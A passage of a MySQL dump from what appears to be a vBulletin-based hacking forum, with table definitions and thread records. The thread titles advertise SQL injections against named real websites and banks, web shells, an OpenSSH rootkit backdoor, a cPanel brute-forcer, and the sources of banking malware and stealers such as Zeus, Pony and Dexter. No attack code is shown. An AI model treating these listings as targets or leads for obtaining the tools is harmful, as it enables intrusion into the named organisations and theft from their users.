(\"\")).\"\r\n\".(($show[\'editor_css\']) ? (\"\r\n$editor_css\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n\r\n\".(($GLOBALS[\'vbulletin\']->options[\'externalrss\']) ? (\"\r\n options[\'bbtitle\'] . \" RSS Feed\\\" href=\\\"external.php?type=RSS2\\\" />\r\n \".(($show[\'foruminfo\'] OR $show[\'threadinfo\']) ? (\"\r\n options[\'bbtitle\'] . \" - $foruminfo[title_clean] - RSS Feed\\\" href=\\\"external.php?type=RSS2&forumids=$foruminfo[forumid]\\\" />\r\n \") : (\"\")).\"\r\n\") : (\"\")).\"', '\r\n\r\n\r\n\r\n$threadinfo[taglist], $threadinfo[prefix_plain_html] $threadinfo[title], $vboptions[keywords]\" />\r\n1\">$vbphrase[page_x]-$threadinfo[prefix_plain_html] $threadinfo[title] $foruminfo[title_clean]\" />\r\n\r\n\r\n1\">$vbphrase[page_x]-$foruminfo[description_clean]\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n$style[css]\r\n\r\n\r\n\r\n\r\n$editor_css\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n', 'template', 1457626032, 'admin', '3.8.7', 'vbulletin'); DROP TABLE IF EXISTS `templatehistory`; CREATE TABLE `templatehistory` ( `templatehistoryid` int(10) unsigned NOT NULL AUTO_INCREMENT, `styleid` smallint(5) unsigned NOT NULL DEFAULT '0', `title` varchar(100) NOT NULL DEFAULT '', `template` mediumtext, `dateline` int(10) unsigned NOT NULL DEFAULT '0', `username` varchar(100) NOT NULL DEFAULT '', `version` varchar(30) NOT NULL DEFAULT '', `comment` varchar(255) NOT NULL DEFAULT '', PRIMARY KEY (`templatehistoryid`), KEY `title` (`title`,`styleid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `thread`; CREATE TABLE `thread` ( `threadid` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(250) NOT NULL DEFAULT '', `prefixid` varchar(25) NOT NULL DEFAULT '', `firstpostid` int(10) unsigned NOT NULL DEFAULT '0', `lastpostid` int(10) unsigned NOT NULL DEFAULT '0', `lastpost` int(10) unsigned NOT NULL DEFAULT '0', `forumid` smallint(5) unsigned NOT NULL DEFAULT '0', `pollid` int(10) unsigned NOT NULL DEFAULT '0', `open` smallint(6) NOT NULL DEFAULT '0', `replycount` int(10) unsigned NOT NULL DEFAULT '0', `hiddencount` int(10) unsigned NOT NULL DEFAULT '0', `deletedcount` int(10) unsigned NOT NULL DEFAULT '0', `postusername` varchar(100) NOT NULL DEFAULT '', `postuserid` int(10) unsigned NOT NULL DEFAULT '0', `lastposter` varchar(100) NOT NULL DEFAULT '', `dateline` int(10) unsigned NOT NULL DEFAULT '0', `views` int(10) unsigned NOT NULL DEFAULT '0', `iconid` smallint(5) unsigned NOT NULL DEFAULT '0', `notes` varchar(250) NOT NULL DEFAULT '', `visible` smallint(6) NOT NULL DEFAULT '0', `sticky` smallint(6) NOT NULL DEFAULT '0', `votenum` smallint(5) unsigned NOT NULL DEFAULT '0', `votetotal` smallint(5) unsigned NOT NULL DEFAULT '0', `attach` smallint(5) unsigned NOT NULL DEFAULT '0', `similar` varchar(55) NOT NULL DEFAULT '', `taglist` mediumtext, PRIMARY KEY (`threadid`), KEY `postuserid` (`postuserid`), KEY `pollid` (`pollid`), KEY `forumid` (`forumid`,`visible`,`sticky`,`lastpost`), KEY `lastpost` (`lastpost`,`forumid`), KEY `dateline` (`dateline`), KEY `prefixid` (`prefixid`,`forumid`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; INSERT INTO `thread` (`threadid`, `title`, `prefixid`, `firstpostid`, `lastpostid`, `lastpost`, `forumid`, `pollid`, `open`, `replycount`, `hiddencount`, `deletedcount`, `postusername`, `postuserid`, `lastposter`, `dateline`, `views`, `iconid`, `notes`, `visible`, `sticky`, `votenum`, `votetotal`, `attach`, `similar`, `taglist`) VALUES (9, 'New invite', '', 9, 9, 1401030928, 2, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1401030928, 33, 0, '', 1, 0, 0, 0, 0, '', NULL), (10, 'New invite', '', 10, 10, 1401064661, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401064661, 24, 0, '', 1, 0, 0, 0, 0, '', NULL), (12, 'New invite', '', 12, 12, 1401078804, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401078804, 23, 0, '', 1, 0, 0, 0, 0, '', NULL), (13, 'New invite', '', 13, 13, 1401093533, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401093533, 20, 0, '', 1, 0, 0, 0, 0, '', NULL), (999, 'New invite', '', 1001, 1001, 1402098764, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402098764, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (1057, '[src]RDPammyy evil1.0', '', 1063, 2994, 1455212696, 15, 0, 1, 2, 0, 0, 'w0rm', 1, 'tdss', 1403420217, 115, 0, '', 1, 0, 0, 0, 0, '', NULL), (1000, 'New invite', '', 1002, 1002, 1402099861, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402099861, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (1001, 'New invite', '', 1003, 1003, 1402223046, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402223046, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (1094, 'Bitrix', '', 1149, 1149, 1404104471, 7, 0, 1, 0, 0, 0, 'null', 9, 'null', 1404104471, 48, 0, '', 1, 0, 0, 0, 0, '', NULL), (1003, 'New invite', '', 1005, 1005, 1402665113, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402665113, 19, 0, '', 1, 0, 0, 0, 0, '', NULL), (1004, 'New invite', '', 1006, 1006, 1402744678, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402744678, 13, 0, '', 1, 0, 0, 0, 0, '', NULL), (1005, 'New invite', '', 1007, 1007, 1402769708, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1402769708, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (1096, '?? ?????Â?????.', '', 1155, 1729, 1408556494, 7, 0, 1, 1, 0, 0, 'Kingbeef', 3, 'w0rm', 1404145216, 54, 0, '', 1, 0, 0, 0, 0, '', NULL), (1093, 'New invite', '', 1142, 1165, 1404164681, 2, 0, 1, 6, 0, 0, 'Invite', 2, 'syslink', 1404050514, 47, 0, '', 1, 0, 0, 0, 0, '', NULL), (1092, 'coru.in (coru.ws)', '', 1141, 2942, 1449432404, 37, 0, 1, 4, 3, 0, 'admin', 1, 'baltazar', 1404040431, 874, 0, '', 1, 0, 0, 0, 0, '', NULL), (1010, 'New invite', '', 1012, 1012, 1403276397, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1403276397, 18, 0, '', 1, 0, 0, 0, 0, '', NULL), (1011, 'etxt.ru [deep blind sql-inj]', '', 1013, 1013, 1403310767, 6, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403310767, 3, 0, '', 1, 0, 0, 0, 0, '', NULL), (1012, 'about', '', 1014, 1014, 1403311001, 6, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403311001, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (1054, 'leakforums.org', '', 1060, 1060, 1403418439, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403418439, 45, 0, '', 0, 0, 0, 0, 0, '', NULL), (1053, '[SQLi] lk.domru.ru', '', 1059, 1059, 1403417910, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403417910, 25, 0, '', 0, 0, 0, 0, 0, '', NULL), (1015, 'hackers&carders forums', '', 1017, 2901, 1446419208, 10, 0, 1, 8, 0, 0, 'w0rm', 1, 'ponypwpw', 1403312657, 443, 0, '', 1, 0, 0, 0, 0, '', NULL), (1016, 'sberbank', '', 1018, 1780, 1408909747, 9, 0, 1, 1, 0, 0, 'w0rm', 1, 'opensc', 1403313958, 133, 0, '', 1, 0, 0, 0, 0, '', NULL), (1017, 'Cve-2014-0322', '', 1020, 1781, 1408910207, 9, 0, 1, 1, 0, 0, 'w0rm', 1, 'opensc', 1403322294, 104, 0, '', 1, 0, 0, 0, 0, '', NULL), (1018, 'OpenSSH rootkit backdoor tool with ssh sniffer', '', 1021, 1592, 1408104457, 9, 0, 1, 1, 0, 0, 'sniffer', 5, '123', 1403334206, 117, 1, '', 1, 0, 0, 0, 0, '', NULL), (1021, 'src fbot', '', 1024, 1024, 1403402926, 15, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403402926, 54, 0, '', 1, 0, 0, 0, 0, '', NULL), (1022, 'Read.Me', '', 1025, 1025, 1403404742, 13, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403404742, 72, 0, '', 1, 1, 0, 0, 0, '', NULL), (1025, 'gazavat', '', 1028, 2985, 1453649532, 15, 0, 1, 5, 0, 0, 'w0rm', 1, 'tdss', 1403406679, 155, 0, '', 1, 0, 0, 0, 0, '', NULL), (1026, 'milw0rm', '', 1029, 3032, 1458689624, 15, 0, 1, 6, 0, 0, 'w0rm', 1, 'tdss', 1403406958, 243, 0, '', 1, 0, 0, 0, 0, '', NULL), (1027, 'Qiwi', '', 1030, 1138, 1403924615, 7, 0, 1, 1, 0, 0, 'w0rm', 1, 'w0rm', 1403408416, 96, 0, '', 1, 0, 0, 0, 0, '', NULL), (1030, 'FuckAV.ru [private]', '', 1033, 1033, 1403408824, 37, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403408824, 764, 0, '', 1, 0, 0, 0, 0, '', NULL), (1031, 'OpenSC.ws', '', 1034, 1034, 1403408894, 37, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403408894, 568, 0, '', 1, 0, 0, 0, 0, '', NULL), (1032, 'Joomla.RU', '', 1035, 1035, 1403409115, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403409115, 30, 0, '', 0, 0, 0, 0, 0, '', NULL), (1033, 'G-Bot Killer', '', 1036, 1071, 1403474386, 15, 0, 1, 2, 0, 0, 'w0rm', 1, 'w0rm', 1403409249, 47, 0, '', 1, 0, 0, 0, 0, '', NULL), (1035, 'ppt.ru [sql-inj]', '', 1038, 1038, 1403409441, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403409441, 31, 0, '', 0, 0, 0, 0, 0, '', NULL), (1036, '[SQL+shell] uniBank Ghana', '', 1039, 1039, 1403409613, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403409613, 35, 0, '', 0, 0, 0, 0, 0, '', NULL), (1037, 'hostinger.ru/auth', '', 1040, 1044, 1403410267, 7, 0, 1, 3, 0, 0, 'w0rm', 1, 'w0rm', 1403409811, 42, 0, '', 0, 0, 0, 0, 0, '', NULL), (1038, 'rog.asus.com', '', 1043, 2984, 1453533442, 7, 0, 1, 1, 0, 0, 'admin', 1, 'w0rm', 1403410139, 50, 0, '', 0, 0, 0, 0, 0, '', NULL), (1039, 'ftp\'s', '', 1045, 1045, 1403410367, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403410367, 147, 0, '', 1, 1, 0, 0, 0, '', NULL), (1040, 'alfabank.com.ua [sql-inj]', '', 1046, 1046, 1403410427, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403410427, 43, 0, '', 0, 0, 0, 0, 0, '', NULL), (1041, 'Wordpress like-dislike-counter-for-posts-pages-and-comments plugin SqlInjection', '', 1047, 1047, 1403410709, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403410709, 20, 0, '', 0, 0, 0, 0, 0, '', NULL), (1042, '[sql-inj] com_jvideoclip Joomla', '', 1048, 1048, 1403410794, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403410794, 18, 0, '', 0, 0, 0, 0, 0, '', NULL), (1043, '???? ????????', '', 1049, 1049, 1403410906, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403410906, 40, 0, '', 0, 0, 0, 0, 0, '', NULL), (1044, 'Community-Now! Data Becker', '', 1050, 1050, 1403411010, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411010, 24, 0, '', 0, 0, 0, 0, 0, '', NULL), (1045, 'rg.ru', '', 1051, 1051, 1403411109, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411109, 65, 0, '', 0, 0, 0, 0, 0, '', NULL), (1046, 'SQLi - RUTV; HitFM; DFM;', '', 1052, 1052, 1403411238, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411238, 28, 0, '', 0, 0, 0, 0, 0, '', NULL), (1048, '??????? ??????? WordPress', '', 1054, 1054, 1403411422, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411422, 24, 0, '', 0, 0, 0, 0, 0, '', NULL), (1049, 'Þýûðùý þñüõýýøú', '', 1055, 1055, 1403411503, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411503, 33, 0, '', 0, 0, 0, 0, 0, '', NULL), (1050, 'kinospisok.ru', '', 1056, 1065, 1403428852, 7, 0, 1, 1, 0, 0, 'w0rm', 1, 'Kingbeef', 1403411561, 42, 0, '', 0, 0, 0, 0, 0, '', NULL), (1051, 'ipcheker httpd.conf', '', 1057, 1057, 1403411721, 16, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411721, 55, 0, '', 1, 0, 0, 0, 0, '', NULL), (1052, 'Брут сPanel', '', 1058, 1058, 1403411805, 16, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403411805, 76, 0, '', 1, 0, 0, 0, 0, '', NULL), (992, 'New invite', '', 994, 994, 1401988883, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401988883, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (567, 'New invite', '', 567, 567, 1401128941, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401128941, 21, 0, '', 1, 0, 0, 0, 0, '', NULL), (996, 'New invite', '', 998, 998, 1401989287, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401989287, 23, 0, '', 1, 0, 0, 0, 0, '', NULL), (578, 'New invite', '', 578, 578, 1401244951, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401244951, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (577, 'New invite', '', 577, 577, 1401244497, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401244497, 11, 0, '', 1, 0, 0, 0, 0, '', NULL), (993, 'New invite', '', 995, 995, 1401989064, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401989064, 6, 0, '', 1, 0, 0, 0, 0, '', NULL), (575, 'New invite', '', 575, 575, 1401215813, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401215813, 14, 0, '', 1, 0, 0, 0, 0, '', NULL), (574, 'New invite', '', 574, 574, 1401213750, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401213750, 11, 0, '', 1, 0, 0, 0, 0, '', NULL), (573, 'New invite', '', 573, 573, 1401213499, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401213499, 13, 0, '', 1, 0, 0, 0, 0, '', NULL), (995, 'New invite', '', 997, 997, 1401989159, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401989159, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (570, 'New invite', '', 570, 570, 1401165970, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401165970, 16, 0, '', 1, 0, 0, 0, 0, '', NULL), (572, 'New invite', '', 572, 572, 1401198598, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401198598, 16, 0, '', 1, 0, 0, 0, 0, '', NULL), (994, 'New invite', '', 996, 996, 1401989102, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401989102, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (978, 'New invite', '', 979, 979, 1401712607, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401712607, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (979, 'New invite', '', 980, 980, 1401714082, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401714082, 20, 0, '', 1, 0, 0, 0, 0, '', NULL), (980, 'ßрðòøûð.', '', 982, 982, 1401725665, 13, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1401725665, 99, 0, '', 1, 1, 0, 0, 0, '', NULL), (981, 'New invite', '', 983, 983, 1401728263, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401728263, 21, 0, '', 1, 0, 0, 0, 0, '', NULL), (984, 'Þрóðýø÷ðцøþýýыõ ôõûð.', '', 986, 986, 1401824546, 13, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1401824546, 60, 0, '', 1, 1, 0, 0, 0, '', NULL), (1091, 'New invite', '', 1139, 1139, 1403988237, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1403988237, 18, 0, '', 1, 0, 0, 0, 0, '', NULL), (1089, 'SQl inj .DK domain', '', 1127, 1163, 1404154995, 7, 0, 1, 6, 0, 0, 'null', 9, 'Psych0tr1a', 1403855906, 115, 0, '', 1, 0, 0, 0, 1, '', NULL), (1061, 'fbooka.com', '', 1068, 1068, 1403466211, 7, 0, 1, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403466211, 28, 0, '', 0, 0, 0, 0, 0, '', NULL), (1063, 'code_exec чõрõ÷ SQLi', '', 1072, 1722, 1408533325, 7, 0, 1, 8, 0, 0, 'w0rm', 1, 'Psych0tr1a', 1403494218, 121, 0, '', 1, 0, 0, 0, 0, '', NULL), (1062, '[Ruby] LFI via phpinfo() exploit', '', 1070, 1070, 1403473503, 16, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1403473503, 95, 0, '', 1, 0, 0, 0, 1, '', NULL), (1064, 'заказы', '', 1073, 2252, 1427703876, 7, 0, 1, 27, 0, 0, 'w0rm', 1, 'w0rm', 1403494841, 857, 0, '', 1, 1, 0, 0, 0, '', NULL), (1065, 'Isfb', '', 1083, 1083, 1403525179, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403525179, 36, 0, '', 1, 0, 0, 0, 0, '', NULL), (1066, 'Pony Stealer', '', 1084, 1084, 1403525482, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403525482, 49, 0, '', 1, 0, 0, 0, 0, '', NULL), (1067, 'Thaimail.com LFI + [2]SQLi', '', 1086, 1764, 1408803863, 7, 0, 1, 7, 0, 0, 'Psych0tr1a', 11, '123', 1403526888, 126, 0, '', 1, 0, 0, 0, 0, '', NULL), (1068, 'Inbox.uz SQLi + src disclosure + mini bug', '', 1087, 1087, 1403527275, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1403527275, 35, 0, '', 1, 0, 0, 0, 0, '', NULL), (1069, 'Gde.ru SQLi', '', 1091, 1091, 1403527726, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1403527726, 32, 0, '', 1, 0, 0, 0, 0, '', NULL), (1070, 'freemail.uz SQLi', '', 1094, 1094, 1403528255, 7, 0, 1, 0, 0, 0, 'Psych0tr1a', 11, 'Psych0tr1a', 1403528255, 30, 0, '', 1, 0, 0, 0, 0, '', NULL), (1071, 'Krypton', '', 1095, 1095, 1403528284, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403528284, 45, 0, '', 1, 0, 0, 0, 0, '', NULL), (1072, 'Dexter 1-2', '', 1098, 1098, 1403529985, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403529985, 42, 0, '', 1, 0, 0, 0, 0, '', NULL), (1073, 'K.i.n.s 1.0.2.0', '', 1099, 1099, 1403533967, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403533967, 48, 0, '', 1, 0, 0, 0, 0, '', NULL), (1074, 'Zeus All version and modification', '', 1100, 1100, 1403534333, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403534333, 60, 0, '', 1, 0, 0, 0, 0, '', NULL), (1075, 'PowerLoader', '', 1101, 1101, 1403534507, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403534507, 42, 0, '', 1, 0, 0, 0, 0, '', NULL), (1076, 'Android bot Stoned Cat', '', 1102, 1102, 1403536317, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403536317, 74, 0, '', 1, 0, 0, 0, 0, '', NULL), (1077, 'hermes aka tatanga', '', 1106, 1106, 1403539034, 15, 0, 1, 0, 0, 0, 'skiffha', 10, 'skiffha', 1403539034, 74, 0, '', 1, 0, 0, 0, 0, '', NULL), (969, 'New invite', '', 970, 970, 1401643211, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401643211, 19, 0, '', 1, 0, 0, 0, 0, '', NULL), (988, 'New invite', '', 990, 990, 1401974407, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401974407, 7, 0, '', 1, 0, 0, 0, 0, '', NULL), (987, 'New invite', '', 989, 989, 1401974405, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401974405, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (989, 'New invite', '', 991, 991, 1401974412, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401974412, 10, 0, '', 1, 0, 0, 0, 0, '', NULL), (972, 'New invite', '', 973, 973, 1401656296, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401656296, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (1019, 'New invite', '', 1022, 1022, 1403342757, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1403342757, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (974, 'New invite', '', 975, 975, 1401680435, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401680435, 14, 0, '', 1, 0, 0, 0, 0, '', NULL), (966, 'New invite', '', 967, 967, 1401633486, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401633486, 13, 0, '', 1, 0, 0, 0, 0, '', NULL), (916, 'New invite', '', 916, 916, 1401336639, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401336639, 16, 0, '', 1, 0, 0, 0, 0, '', NULL), (917, 'New invite', '', 917, 917, 1401336674, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401336674, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (919, 'New invite', '', 919, 919, 1401342899, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401342899, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (961, 'New invite', '', 962, 962, 1401623938, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401623938, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (921, 'New invite', '', 921, 921, 1401346008, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401346008, 22, 0, '', 1, 0, 0, 0, 0, '', NULL), (922, 'New invite', '', 922, 922, 1401346447, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401346447, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (923, 'New invite', '', 923, 923, 1401348770, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401348770, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (991, 'New invite', '', 993, 993, 1401988660, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401988660, 9, 0, '', 1, 0, 0, 0, 0, '', NULL), (968, 'New invite', '', 969, 969, 1401639433, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401639433, 14, 0, '', 1, 0, 0, 0, 0, '', NULL), (926, 'New invite', '', 926, 926, 1401381777, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401381777, 14, 0, '', 1, 0, 0, 0, 0, '', NULL), (927, 'New invite', '', 927, 927, 1401384050, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401384050, 20, 0, '', 1, 0, 0, 0, 0, '', NULL), (928, 'New invite', '', 928, 928, 1401390423, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401390423, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (965, 'New invite', '', 966, 966, 1401633335, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401633335, 13, 0, '', 1, 0, 0, 0, 0, '', NULL), (990, 'New invite', '', 992, 992, 1401978376, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401978376, 11, 0, '', 1, 0, 0, 0, 0, '', NULL), (962, 'New invite', '', 963, 963, 1401624142, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401624142, 11, 0, '', 1, 0, 0, 0, 0, '', NULL), (964, 'New invite', '', 965, 965, 1401628090, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401628090, 14, 0, '', 1, 0, 0, 0, 0, '', NULL), (930, 'New invite', '', 930, 930, 1401412714, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401412714, 22, 0, '', 1, 0, 0, 0, 0, '', NULL), (931, 'New invite', '', 931, 931, 1401412763, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401412763, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (932, 'New invite', '', 932, 932, 1401412996, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401412996, 16, 0, '', 1, 0, 0, 0, 0, '', NULL), (933, 'New invite', '', 933, 933, 1401431371, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401431371, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (955, 'New invite', '', 956, 956, 1401598131, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401598131, 16, 0, '', 1, 0, 0, 0, 0, '', NULL), (937, 'New invite', '', 938, 938, 1401473259, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401473259, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (954, 'New invite', '', 955, 955, 1401585919, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401585919, 13, 0, '', 1, 0, 0, 0, 0, '', NULL), (938, 'New invite', '', 939, 939, 1401475724, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401475724, 20, 0, '', 1, 0, 0, 0, 0, '', NULL), (939, 'New invite', '', 940, 940, 1401546324, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401546324, 11, 0, '', 1, 0, 0, 0, 0, '', NULL), (953, 'New invite', '', 954, 954, 1401585377, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401585377, 12, 0, '', 1, 0, 0, 0, 0, '', NULL), (941, 'New invite', '', 942, 942, 1401559552, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401559552, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (942, 'New invite', '', 943, 943, 1401559638, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401559638, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (943, 'New invite', '', 944, 944, 1401559677, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401559677, 13, 0, '', 1, 0, 0, 0, 0, '', NULL), (945, 'New invite', '', 946, 946, 1401562809, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401562809, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (946, 'New invite', '', 947, 947, 1401562832, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401562832, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (947, 'New invite', '', 948, 948, 1401562978, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401562978, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (948, 'New invite', '', 949, 949, 1401563142, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401563142, 15, 0, '', 1, 0, 0, 0, 0, '', NULL), (949, 'New invite', '', 950, 950, 1401563845, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401563845, 18, 0, '', 1, 0, 0, 0, 0, '', NULL), (950, 'New invite', '', 951, 951, 1401564546, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401564546, 20, 0, '', 1, 0, 0, 0, 0, '', NULL), (951, 'New invite', '', 952, 952, 1401564992, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401564992, 18, 0, '', 1, 0, 0, 0, 0, '', NULL), (952, 'New invite', '', 953, 953, 1401565042, 2, 0, 1, 0, 0, 0, 'Invite', 2, 'Invite', 1401565042, 18, 0, '', 1, 0, 0, 0, 0, '', NULL), (1099, 'SSL - https://w0rm.pw', '', 1170, 2109, 1411203918, 13, 0, 1, 3, 0, 0, 'w0rm', 1, 'lumbricus', 1404233847, 112, 0, '', 1, 1, 0, 0, 0, '', NULL), (1079, 'adagio.com shop SQLi', '', 1115, 1115, 1403721092, 7, 0, 1, 0, 0, 